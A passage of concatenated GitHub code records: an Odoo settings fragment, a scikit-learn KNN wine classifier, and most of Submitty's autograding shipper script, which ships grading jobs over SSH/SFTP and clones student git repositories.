self.env['ir.config_parameter'].set_param('school.product_default_many2many', self.product_default_many2many.ids)","repo_name":"congson95dev/odoo-15-school","sub_path":"school/models/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30533593709","text":"# load the red wine dataset\nfrom sklearn.datasets import load_wine\n# KNN classification algorithm\nfrom sklearn.neighbors import KNeighborsClassifier\n# split into training and test sets\nfrom sklearn.model_selection import train_test_split\n# import numpy\nimport numpy as np\n# load the dataset\nwine_dataset=load_wine()\n# inspect the dataset's keys\nprint("Keys of the wine dataset:\\n{}".format(wine_dataset.keys()))\nprint("Shape of the data:\\n{}".format(wine_dataset['data'].shape))\n# data holds the feature matrix; target holds the sample labels\n# split the dataset, train:test = 8:2\nX_train,X_test,y_train,y_test=train_test_split(wine_dataset['data'],wine_dataset['target'],test_size=0.2,random_state=0)\n# build the KNN classifier and set the value of k\nKNN=KNeighborsClassifier(n_neighbors=10)\n# train the model on the training set\nKNN.fit(X_train,y_train)\n# evaluate the model's score\nscore=KNN.score(X_test,y_test)\nprint(score)\n# classify a new wine sample\nX_wine_test=np.array([[11.8,4.39,2.39,29,82,2.86,3.53,0.21,2.85,2.8,.75,3.78,490]])\npredict_result=KNN.predict(X_wine_test)\nprint(predict_result)\nprint("Classification result: {}".format(wine_dataset['target_names'][predict_result]))","repo_name":"YuanjieHuang/mycode_kali","sub_path":"python/scikit_learn/K_Nearest_Neighbor.py","file_name":"K_Nearest_Neighbor.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17022675903","text":"#!/usr/bin/env python3\n\nimport os\nimport time\nimport signal\nimport json\n\nimport shutil\nimport contextlib\nimport datetime\nimport multiprocessing\nfrom pathlib import Path\nfrom submitty_utils import dateutils\nimport operator\nimport paramiko\nimport tempfile\nimport socket\nimport traceback\nimport subprocess\nimport urllib.parse  # fix: checkout_vcs_repo() below calls urllib.parse.urljoin, but urllib was never imported\n\nfrom autograder import autograding_utils\nfrom autograder import 
packer_unpacker\n\nCONFIG_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'config')\nwith open(os.path.join(CONFIG_PATH, 'submitty.json')) as open_file:\n OPEN_JSON = json.load(open_file)\nSUBMITTY_DATA_DIR = OPEN_JSON['submitty_data_dir']\nSUBMITTY_INSTALL_DIR = OPEN_JSON['submitty_install_dir']\nAUTOGRADING_LOG_PATH = OPEN_JSON['autograding_log_path']\nAUTOGRADING_STACKTRACE_PATH = os.path.join(OPEN_JSON['autograding_log_path'], 'stack_traces')\n\nwith open(os.path.join(CONFIG_PATH, 'submitty_users.json')) as open_file:\n OPEN_JSON = json.load(open_file)\nDAEMON_UID = OPEN_JSON['daemon_uid']\n\nINTERACTIVE_QUEUE = os.path.join(SUBMITTY_DATA_DIR, \"to_be_graded_queue\")\n\nJOB_ID = '~SHIP~'\n\n\n# ==================================================================================\ndef initialize(untrusted_queue):\n \"\"\"\n Initializer function for all our processes. We get one untrusted user off our queue which\n we then set in our Process. We cannot recycle the shipper process as else the untrusted user\n we set for this process will be lost.\n\n :param untrusted_queue: multiprocessing.queues.Queue that contains all untrusted users left to\n assign\n \"\"\"\n multiprocessing.current_process().untrusted = untrusted_queue.get()\n\n# ==================================================================================\ndef add_fields_to_autograding_worker_json(autograding_worker_json, entry):\n\n submitty_config = os.path.join(SUBMITTY_INSTALL_DIR, 'config', 'version.json')\n\n try:\n with open(submitty_config) as infile:\n submitty_details = json.load(infile)\n installed_commit = submitty_details['installed_commit']\n most_recent_tag = submitty_details['most_recent_git_tag']\n except FileNotFoundError as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())\n raise SystemExit(\"ERROR, could not locate the submitty.json:\", e)\n\n autograding_worker_json[entry]['server_name'] = socket.getfqdn()\n autograding_worker_json[entry]['primary_commit'] = installed_commit\n autograding_worker_json[entry]['most_recent_tag'] = most_recent_tag\n return autograding_worker_json\n# ==================================================================================\ndef update_all_foreign_autograding_workers():\n success_map = dict()\n all_workers_json = os.path.join(SUBMITTY_INSTALL_DIR, 'config', \"autograding_workers.json\")\n\n try:\n with open(all_workers_json, 'r') as infile:\n autograding_workers = json.load(infile)\n except FileNotFoundError as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())\n raise SystemExit(\"ERROR, could not locate autograding_workers_json :\", e)\n\n for key, value in autograding_workers.items():\n if value['enabled'] == False:\n continue\n formatted_entry = {key: value}\n formatted_entry = add_fields_to_autograding_worker_json(formatted_entry, key)\n success = update_worker_json(key, formatted_entry)\n success_map[key] = success\n return success_map\n\n# ==================================================================================\n# Updates the autograding_worker.json in a workers autograding_TODO folder (tells it)\n# how many threads to be running on startup.\ndef update_worker_json(name, entry):\n\n fd, tmp_json_path = tempfile.mkstemp()\n foreign_json = os.path.join(SUBMITTY_DATA_DIR, \"autograding_TODO\", \"autograding_worker.json\")\n autograding_worker_to_ship = entry\n\n try:\n user = autograding_worker_to_ship[name]['username']\n host = 
autograding_worker_to_ship[name]['address']\n    except Exception as e:\n        print("ERROR: autograding_workers.json entry for {0} is malformed. {1}".format(name, e))\n        autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: autograding_workers.json entry for {0} is malformed. {1}".format(name, e))\n        autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n        return False\n\n    #create a new temporary json with only the entry for the current machine.\n    with open(tmp_json_path, 'w') as outfile:\n        json.dump(autograding_worker_to_ship, outfile, sort_keys=True, indent=4)\n    #if we are updating the current machine, we can just move the new json to the appropriate spot (no ssh needed)\n    if host == "localhost":\n        try:\n            shutil.move(tmp_json_path,foreign_json)\n            print("Successfully updated local autograding_TODO/autograding_worker.json")\n            autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Successfully updated local autograding_TODO/autograding_worker.json")\n            return True\n        except Exception as e:\n            autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n            autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not mv to local autograding_TODO/autograding_worker.json due to the following error: "+str(e))\n            print("ERROR: could not mv to local autograding_worker.json due to the following error: {0}".format(e))\n            return False\n        finally:\n            os.close(fd)\n    #if we are updating a foreign machine, we must connect via ssh and use sftp to update it.\n    else:\n        #try to establish an ssh connection to the host\n        try:\n            ssh = paramiko.SSHClient()\n            ssh.get_host_keys()\n            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n            ssh.connect(hostname = host, username = user, timeout=5)\n        except Exception as e:\n            autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n            autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not ssh to {0}@{1} due to following error: {2}".format(user, host,str(e)))\n            print("ERROR: could not ssh to {0}@{1} due to following error: {2}".format(user, host,str(e)))\n            return False\n        #try to copy the files over to the host\n        try:\n            sftp = ssh.open_sftp()\n\n            sftp.put(tmp_json_path,foreign_json)\n\n            sftp.close()\n            print("Successfully forwarded autograding_worker.json to {0}".format(name))\n            autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Successfully forwarded autograding_worker.json to {0}".format(name))\n            success = True\n        except Exception as e:\n            autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n            autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not sftp to foreign autograding_TODO/autograding_worker.json due to the following error: "+str(e))\n            print("ERROR: could not sftp to foreign autograding_TODO/autograding_worker.json due to the following error: {0}".format(e))\n            success = False\n        finally:\n            os.close(fd)\n            os.remove(tmp_json_path)\n            sftp.close()\n            ssh.close()\n        return success\n\n# ==================================================================================\ndef prepare_job(my_name,which_machine,which_untrusted,next_directory,next_to_grade):\n    # verify the DAEMON_USER is running this script\n    if not int(os.getuid()) == int(DAEMON_UID):\n        autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: 
must be run by DAEMON_USER\")\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n\n if which_machine == 'localhost':\n address = which_machine\n else:\n address = which_machine.split('@')[1]\n\n # prepare the zip files\n try:\n autograding_zip_tmp,submission_zip_tmp = packer_unpacker.prepare_autograding_and_submission_zip(which_machine,which_untrusted,next_directory,next_to_grade)\n fully_qualified_domain_name = socket.getfqdn()\n servername_workername = \"{0}_{1}\".format(fully_qualified_domain_name, address)\n autograding_zip = os.path.join(SUBMITTY_DATA_DIR,\"autograding_TODO\",servername_workername+\"_\"+which_untrusted+\"_autograding.zip\")\n submission_zip = os.path.join(SUBMITTY_DATA_DIR,\"autograding_TODO\",servername_workername+\"_\"+which_untrusted+\"_submission.zip\")\n todo_queue_file = os.path.join(SUBMITTY_DATA_DIR,\"autograding_TODO\",servername_workername+\"_\"+which_untrusted+\"_queue.json\")\n\n with open(next_to_grade, 'r') as infile:\n queue_obj = json.load(infile)\n queue_obj[\"which_untrusted\"] = which_untrusted\n queue_obj[\"which_machine\"] = which_machine\n queue_obj[\"ship_time\"] = dateutils.write_submitty_date(microseconds=True)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: failed preparing submission zip or accessing next to grade \"+str(e))\n print(\"ERROR: failed preparing submission zip or accessing next to grade \", e)\n return False\n\n if address == \"localhost\":\n try:\n shutil.move(autograding_zip_tmp,autograding_zip)\n shutil.move(submission_zip_tmp,submission_zip)\n with open(todo_queue_file, 'w') as outfile:\n json.dump(queue_obj, outfile, sort_keys=True, indent=4)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: could not move files due to the following error: \"+str(e))\n print(\"ERROR: could not move files due to the following error: {0}\".format(e))\n return False\n else:\n try:\n user, host = which_machine.split(\"@\")\n ssh = paramiko.SSHClient()\n ssh.get_host_keys()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n ssh.connect(hostname = host, username = user, timeout=5)\n sftp = ssh.open_sftp()\n\n sftp.put(autograding_zip_tmp,autograding_zip)\n sftp.put(submission_zip_tmp,submission_zip)\n with open(todo_queue_file, 'w') as outfile:\n json.dump(queue_obj, outfile, sort_keys=True, indent=4)\n sftp.put(todo_queue_file, todo_queue_file)\n os.remove(todo_queue_file)\n print(\"Successfully forwarded files to {0}\".format(my_name))\n success = True\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: could not move files due to the following error: \"+str(e))\n print(\"Could not move files due to the following error: {0}\".format(e))\n success = False\n finally:\n sftp.close()\n ssh.close()\n os.remove(autograding_zip_tmp)\n os.remove(submission_zip_tmp)\n return success\n\n # log completion of job preparation\n obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)\n partial_path = os.path.join(obj[\"gradeable\"],obj[\"who\"],str(obj[\"version\"]))\n item_name = 
os.path.join(obj[\"semester\"],obj[\"course\"],\"submissions\",partial_path)\n is_batch = \"regrade\" in obj and obj[\"regrade\"]\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted,\n is_batch=is_batch, message=\"Prepared job for \" + which_machine)\n return True\n\n\n# ==================================================================================\n# ==================================================================================\ndef unpack_job(which_machine,which_untrusted,next_directory,next_to_grade):\n\n # variables needed for logging\n obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)\n partial_path = os.path.join(obj[\"gradeable\"],obj[\"who\"],str(obj[\"version\"]))\n item_name = os.path.join(obj[\"semester\"],obj[\"course\"],\"submissions\",partial_path)\n is_batch = \"regrade\" in obj and obj[\"regrade\"]\n\n # verify the DAEMON_USER is running this script\n if not int(os.getuid()) == int(DAEMON_UID):\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: must be run by DAEMON_USER\")\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n\n if which_machine == 'localhost':\n address = which_machine\n else:\n address = which_machine.split('@')[1]\n\n fully_qualified_domain_name = socket.getfqdn()\n servername_workername = \"{0}_{1}\".format(fully_qualified_domain_name, address)\n target_results_zip = os.path.join(SUBMITTY_DATA_DIR,\"autograding_DONE\",servername_workername+\"_\"+which_untrusted+\"_results.zip\")\n target_done_queue_file = os.path.join(SUBMITTY_DATA_DIR,\"autograding_DONE\",servername_workername+\"_\"+which_untrusted+\"_queue.json\")\n\n if which_machine == \"localhost\":\n if not os.path.exists(target_done_queue_file):\n return False\n else:\n local_done_queue_file = target_done_queue_file\n local_results_zip = target_results_zip\n else:\n user, host = which_machine.split(\"@\")\n ssh = paramiko.SSHClient()\n ssh.get_host_keys()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n try:\n ssh.connect(hostname = host, username = user, timeout=5)\n\n sftp = ssh.open_sftp()\n fd1, local_done_queue_file = tempfile.mkstemp()\n fd2, local_results_zip = tempfile.mkstemp()\n #remote path first, then local.\n sftp.get(target_done_queue_file, local_done_queue_file)\n sftp.get(target_results_zip, local_results_zip)\n #Because get works like cp rather tnan mv, we have to clean up.\n sftp.remove(target_done_queue_file)\n sftp.remove(target_results_zip)\n success = True\n #This is the normal case (still grading on the other end) so we don't need to print anything.\n except FileNotFoundError:\n os.remove(local_results_zip)\n os.remove(local_done_queue_file)\n success = False\n #In this more general case, we do want to print what the error was.\n #TODO catch other types of exception as we identify them.\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: Could not retrieve the file from the foreign machine \"+str(e))\n print(\"ERROR: Could not retrieve the file from the foreign machine.\\nERROR: {0}\".format(e))\n os.remove(local_results_zip)\n os.remove(local_done_queue_file)\n success = False\n finally:\n os.close(fd1)\n os.close(fd2)\n sftp.close()\n ssh.close()\n if not success:\n return False\n # archive the results of grading\n try:\n 
success = packer_unpacker.unpack_grading_results_zip(which_machine,which_untrusted,local_results_zip)\n except:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID,jobname=item_name,message=\"ERROR: Exception when unpacking zip. For more details, see traces entry.\")\n with contextlib.suppress(FileNotFoundError):\n os.remove(local_results_zip)\n success = False\n\n with contextlib.suppress(FileNotFoundError):\n os.remove(local_done_queue_file)\n\n msg = \"Unpacked job from \" + which_machine if success else \"ERROR: failure returned from worker machine\"\n print(msg)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted, is_batch=is_batch, message=msg)\n return True\n\n\n# ==================================================================================\ndef grade_queue_file(my_name, which_machine,which_untrusted,queue_file):\n \"\"\"\n Oversees the autograding of single item from the queue\n\n :param queue_file: details of what to grade\n :param which_machine: name of machine to send this job to (might be \"localhost\")\n :param which_untrusted: specific untrusted user for this autograding job\n \"\"\"\n\n my_dir,my_file=os.path.split(queue_file)\n pid = os.getpid()\n directory = os.path.dirname(os.path.realpath(queue_file))\n name = os.path.basename(os.path.realpath(queue_file))\n grading_file = os.path.join(directory, \"GRADING_\" + name)\n\n #TODO: break which_machine into id, address, and passphrase.\n \n try:\n # prepare the job\n shipper_counter=0\n\n prep_job_success = prepare_job(my_name,which_machine, which_untrusted, my_dir, queue_file)\n if not prep_job_success:\n print (my_name, \" ERROR unable to prepare job: \", queue_file)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR unable to prepare job: \" + queue_file)\n\n else:\n # then wait for grading to be completed\n shipper_counter=0\n while not unpack_job(which_machine, which_untrusted, my_dir, queue_file):\n shipper_counter+=1\n time.sleep(1)\n if shipper_counter >= 10:\n print (my_name,which_untrusted,\"shipper wait for grade: \",queue_file)\n shipper_counter=0\n\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print (my_name, \" ERROR attempting to grade item: \", queue_file, \" exception=\",str(e))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR attempting to grade item: \" + queue_file + \" exception \" + repr(e))\n\n # note: not necessary to acquire lock for these statements, but\n # make sure you remove the queue file, then the grading file\n try:\n os.remove(queue_file)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print (my_name, \" ERROR attempting to remove queue file: \", queue_file, \" exception=\",str(e))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR attempting to remove queue file: \" + queue_file + \" exception=\" + str(e))\n try:\n os.remove(grading_file)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print (my_name, \" ERROR attempting to remove grading file: \", grading_file, \" exception=\",str(e))\n 
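unpack_job above emulates a remote "mv" over SFTP: it copies the results into local tempfiles with sftp.get() and then sftp.remove()s the remote originals, because SFTP's get copies rather than moves. A condensed, hypothetical sketch of that fetch-then-delete pattern (sftp_take is an illustrative name, not from the Submitty codebase):

import os
import tempfile
import paramiko

def sftp_take(host: str, user: str, remote_path: str) -> str:
    """Copy remote_path into a local temp file and delete the remote copy (move semantics)."""
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(hostname=host, username=user, timeout=5)
    try:
        sftp = ssh.open_sftp()
        fd, local_path = tempfile.mkstemp()
        os.close(fd)                       # keep the path, release the descriptor
        sftp.get(remote_path, local_path)  # remote path first, then local
        sftp.remove(remote_path)           # emulate mv: clean up the source
        sftp.close()
        return local_path
    finally:
        ssh.close()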
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR attempting to remove grading file: \" + grading_file + \" exception=\" + str(e))\n\n\n# ==================================================================================\n# ==================================================================================\ndef valid_github_user_id(userid):\n # Github username may only contain alphanumeric characters or\n # hyphens. Github username cannot have multiple consecutive\n # hyphens. Github username cannot begin or end with a hyphen.\n # Maximum is 39 characters.\n #\n # NOTE: We only scrub the input for allowed characters.\n if (userid==''):\n # GitHub userid cannot be empty\n return False\n checklegal = lambda char: char.isalnum() or char == '-'\n filtered_userid = ''.join(list(filter(checklegal,userid)))\n if not userid == filtered_userid:\n return False\n return True\n\n\ndef valid_github_repo_id(repoid):\n # Only characters, numbers, dots, minus and underscore are allowed.\n if (repoid==''):\n # GitHub repoid cannot be empty\n return False\n checklegal = lambda char: char.isalnum() or char == '.' or char == '-' or char == '_'\n filtered_repoid = ''.join(list(filter(checklegal,repoid)))\n if not repoid == filtered_repoid:\n return False\n return True\n\n\ndef checkout_vcs_repo(my_file):\n print (\"SHIPPER CHECKOUT VCS REPO \", my_file)\n\n with open(my_file, 'r') as infile:\n obj = json.load(infile)\n\n partial_path = os.path.join(obj[\"gradeable\"],obj[\"who\"],str(obj[\"version\"]))\n course_dir = os.path.join(SUBMITTY_DATA_DIR, \"courses\", obj[\"semester\"], obj[\"course\"])\n submission_path = os.path.join(course_dir, \"submissions\", partial_path)\n checkout_path = os.path.join(course_dir, \"checkout\", partial_path)\n results_path = os.path.join(course_dir, \"results\", partial_path)\n\n is_vcs,vcs_type,vcs_base_url,vcs_subdirectory = packer_unpacker.get_vcs_info(SUBMITTY_DATA_DIR,obj[\"semester\"],obj[\"course\"],obj[\"gradeable\"],obj[\"who\"],obj[\"team\"])\n\n # cleanup the previous checkout (if it exists)\n shutil.rmtree(checkout_path,ignore_errors=True)\n os.makedirs(checkout_path, exist_ok=True)\n\n job_id = \"~VCS~\"\n\n try:\n # If we are public or private github, we will have an empty vcs_subdirectory\n if vcs_subdirectory == '':\n with open (os.path.join(submission_path,\".submit.VCS_CHECKOUT\")) as submission_vcs_file:\n VCS_JSON = json.load(submission_vcs_file)\n git_user_id = VCS_JSON[\"git_user_id\"]\n git_repo_id = VCS_JSON[\"git_repo_id\"]\n if not valid_github_user_id(git_user_id):\n raise Exception (\"Invalid GitHub user/organization name: '\"+git_user_id+\"'\")\n if not valid_github_repo_id(git_repo_id):\n raise Exception (\"Invalid GitHub repository name: '\"+git_repo_id+\"'\")\n # construct path for GitHub\n vcs_path=\"https://www.github.com/\"+git_user_id+\"/\"+git_repo_id\n\n # is vcs_subdirectory standalone or should it be combined with base_url?\n elif vcs_subdirectory[0] == '/' or '://' in vcs_subdirectory:\n vcs_path = vcs_subdirectory\n else:\n if '://' in vcs_base_url:\n vcs_path = urllib.parse.urljoin(vcs_base_url, vcs_subdirectory)\n else:\n vcs_path = os.path.join(vcs_base_url, vcs_subdirectory)\n\n # warning: --depth is ignored in local clones; use file:// instead.\n if not '://' in vcs_path:\n vcs_path = \"file:///\" + vcs_path\n\n Path(results_path+\"/logs\").mkdir(parents=True, exist_ok=True)\n checkout_log_file = os.path.join(results_path, \"logs\", \"vcs_checkout.txt\")\n\n # grab the submission time\n with 
open (os.path.join(submission_path,\".submit.timestamp\")) as submission_time_file:\n submission_string = submission_time_file.read().rstrip()\n\n\n # OPTION: A shallow clone with only the most recent commit\n # from the submission timestamp.\n #\n # NOTE: if the student has set their computer time in the\n # future, they could be confused that we don't grab their\n # most recent code.\n # NOTE: github repos currently fail (a bug?) with an error when\n # --shallow-since is used:\n # \"fatal: The remote end hung up unexpectedly\"\n #\n #clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--shallow-since='+submission_string, '-b', 'master']\n\n\n # OPTION: A shallow clone, with just the most recent commit.\n #\n # NOTE: If the server is busy, it might take seconds or\n # minutes for an available shipper to process the git\n # clone, and thethe timestamp might be slightly late)\n #\n # So we choose this option! (for now)\n #\n clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--depth', '1', '-b', 'master']\n\n\n with open(checkout_log_file, 'a') as f:\n print(\"VCS CHECKOUT\", file=f)\n print('vcs_base_url', vcs_base_url, file=f)\n print('vcs_subdirectory', vcs_subdirectory, file=f)\n print('vcs_path', vcs_path, file=f)\n print(' '.join(clone_command), file=f)\n print(\"\\n====================================\\n\", file=f)\n\n # git clone may fail -- because repository does not exist,\n # or because we don't have appropriate access credentials\n try:\n subprocess.check_call(clone_command)\n os.chdir(checkout_path)\n\n # determine which version we need to checkout\n # if the repo is empty or the master branch does not exist, this command will fail\n try:\n what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', 'master'])\n # old method: when we had the full history, roll-back to a version by date\n #what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', '--before=\"'+submission_string+'\"', 'master'])\n what_version = str(what_version.decode('utf-8')).rstrip()\n if what_version == \"\":\n # oops, pressed the grade button before a valid commit\n shutil.rmtree(checkout_path, ignore_errors=True)\n # old method:\n #else:\n # # and check out the right version\n # subprocess.call(['git', 'checkout', '-b', 'grade', what_version])\n\n subprocess.call(['ls', '-lR', checkout_path], stdout=open(checkout_log_file, 'a'))\n print(\"\\n====================================\\n\", file=open(checkout_log_file, 'a'))\n subprocess.call(['du', '-skh', checkout_path], stdout=open(checkout_log_file, 'a'))\n obj['revision'] = what_version\n\n # exception on git rev-list\n except subprocess.CalledProcessError as error:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message=\"ERROR: failed to determine version on master branch \" + str(error))\n os.chdir(checkout_path)\n with open(os.path.join(checkout_path,\"failed_to_determine_version_on_master_branch.txt\"),'w') as f:\n print(str(error),file=f)\n print(\"\\n\",file=f)\n print(\"Check to be sure the repository is not empty.\\n\",file=f)\n print(\"Check to be sure the repository has a master branch.\\n\",file=f)\n print(\"And check to be sure the timestamps on the master branch are reasonable.\\n\",file=f)\n\n # exception on git clone\n except subprocess.CalledProcessError as error:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message=\"ERROR: failed to clone repository \" + str(error))\n os.chdir(checkout_path)\n with 
open(os.path.join(checkout_path,\"failed_to_clone_repository.txt\"),'w') as f:\n print(str(error),file=f)\n print(\"\\n\",file=f)\n print(\"Check to be sure the repository exists.\\n\",file=f)\n print(\"And check to be sure the submitty_daemon user has appropriate access credentials.\\n\",file=f)\n\n # exception in constructing full git repository url/path\n except Exception as error:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message=\"ERROR: failed to construct valid repository url/path\" + str(error))\n os.chdir(checkout_path)\n with open(os.path.join(checkout_path,\"failed_to_construct_valid_repository_url.txt\"),'w') as f:\n print(str(error),file=f)\n print(\"\\n\",file=f)\n print(\"Check to be sure the repository exists.\\n\",file=f)\n print(\"And check to be sure the submitty_daemon user has appropriate access credentials.\\n\",file=f)\n\n return obj\n\n# ==================================================================================\ndef get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock):\n \"\"\"\n Picks a job from the queue\n\n :param overall_lock: a lock on the directory containing all queue files\n \"\"\"\n\n time_get_job_begin = dateutils.get_current_time()\n\n overall_lock.acquire()\n folder= INTERACTIVE_QUEUE\n\n\n # ----------------------------------------------------------------\n # Our first priority is to perform any awaiting VCS checkouts\n\n # Note: This design is imperfect:\n #\n # * If all shippers are busy working on long-running autograding\n # tasks there will be a delay of seconds or minutes between\n # a student pressing the submission button and clone happening.\n # This is a minor exploit allowing them to theoretically\n # continue working on their submission past the deadline for\n # the time period of the delay.\n # -- This is not a significant, practical problem.\n #\n # * If multiple and/or large git submissions arrive close\n # together, this shipper job will be tied up performing these\n # clone operations. 
Because we don't release the lock, any\n # other shippers that complete their work will also be blocked\n # from either helping with the clones or tackling the next\n # autograding job.\n # -- Based on experience with actual submission patterns, we\n # do not anticipate that this will be a significant\n # bottleneck at this time.\n #\n # * If a git clone takes a very long time and/or hangs because of\n # network problems, this could halt all work on the server.\n # -- We'll need to monitor the production server.\n #\n # We plan to do a complete overhaul of the\n # scheduler/shipper/worker and refactoring this design should be\n # part of the project.\n\n # Grab all the VCS files currently in the folder...\n vcs_files = [str(f) for f in Path(folder).glob('VCS__*')]\n for f in vcs_files:\n vcs_file = f[len(folder)+1:]\n no_vcs_file = f[len(folder)+1+5:]\n # do the checkout\n updated_obj = checkout_vcs_repo(folder+\"/\"+vcs_file)\n # save the regular grading queue file\n with open(os.path.join(folder,no_vcs_file), \"w\") as queue_file:\n json.dump(updated_obj, queue_file)\n # cleanup the vcs queue file\n os.remove(folder+\"/\"+vcs_file)\n # ----------------------------------------------------------------\n\n\n # Grab all the files currently in the folder, sorted by creation\n # time, and put them in the queue to be graded\n files = [str(f) for f in Path(folder).glob('*')]\n files_and_times = list()\n for f in files:\n try:\n my_time = os.path.getctime(f)\n except:\n continue\n tup = (f, my_time)\n files_and_times.append(tup)\n\n files_and_times = sorted(files_and_times, key=operator.itemgetter(1))\n my_job=\"\"\n\n for full_path_file, file_time in files_and_times:\n # get the file name (without the path)\n just_file = full_path_file[len(folder)+1:]\n # skip items that are already being graded\n if (just_file[0:8]==\"GRADING_\"):\n continue\n grading_file = os.path.join(folder,\"GRADING_\"+just_file)\n if grading_file in files:\n continue\n\n # found something to do\n try:\n with open(full_path_file, 'r') as infile:\n queue_obj = json.load(infile)\n except:\n continue\n\n #Check to make sure that we are capable of grading this submission\n required_capabilities = queue_obj[\"required_capabilities\"]\n if not required_capabilities in my_capabilities:\n continue\n\n # prioritize interactive jobs over (batch) regrades\n # if you've found an interactive job, exit early (since they are sorted by timestamp)\n if not \"regrade\" in queue_obj or not queue_obj[\"regrade\"]:\n my_job = just_file\n break\n\n # otherwise it's a regrade, and if we don't already have a\n # job, take it, but we have to search the rest of the list\n if my_job == \"\":\n my_job = just_file\n\n if not my_job == \"\":\n grading_file = os.path.join(folder, \"GRADING_\" + my_job)\n # create the grading file\n with open(os.path.join(grading_file), \"w\") as queue_file:\n json.dump({\"untrusted\": which_untrusted}, queue_file)\n\n overall_lock.release()\n\n time_get_job_end = dateutils.get_current_time()\n\n time_delta = time_get_job_end-time_get_job_begin\n if time_delta > datetime.timedelta(milliseconds=100):\n print (my_name, \" WARNING: submitty_autograding shipper get_job time \", time_delta)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" WARNING: submitty_autograding shipper get_job time \"+str(time_delta))\n\n return (my_job)\n\n\n# ==================================================================================\n# 
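The selection loop in get_job above scans the queue files oldest-first, skips anything already claimed by a GRADING_ marker file, returns the first interactive job immediately (the list is time-sorted, so it can break early), and otherwise falls back to the oldest regrade. The priority rule, reduced to a hypothetical sketch (pick_job and queue_objs are illustrative names):

def pick_job(queue_objs):
    """queue_objs: list of (filename, obj) pairs sorted oldest-first.
    Return the first interactive job if any; otherwise the oldest regrade."""
    fallback = ""
    for fname, obj in queue_objs:
        if not obj.get("regrade"):
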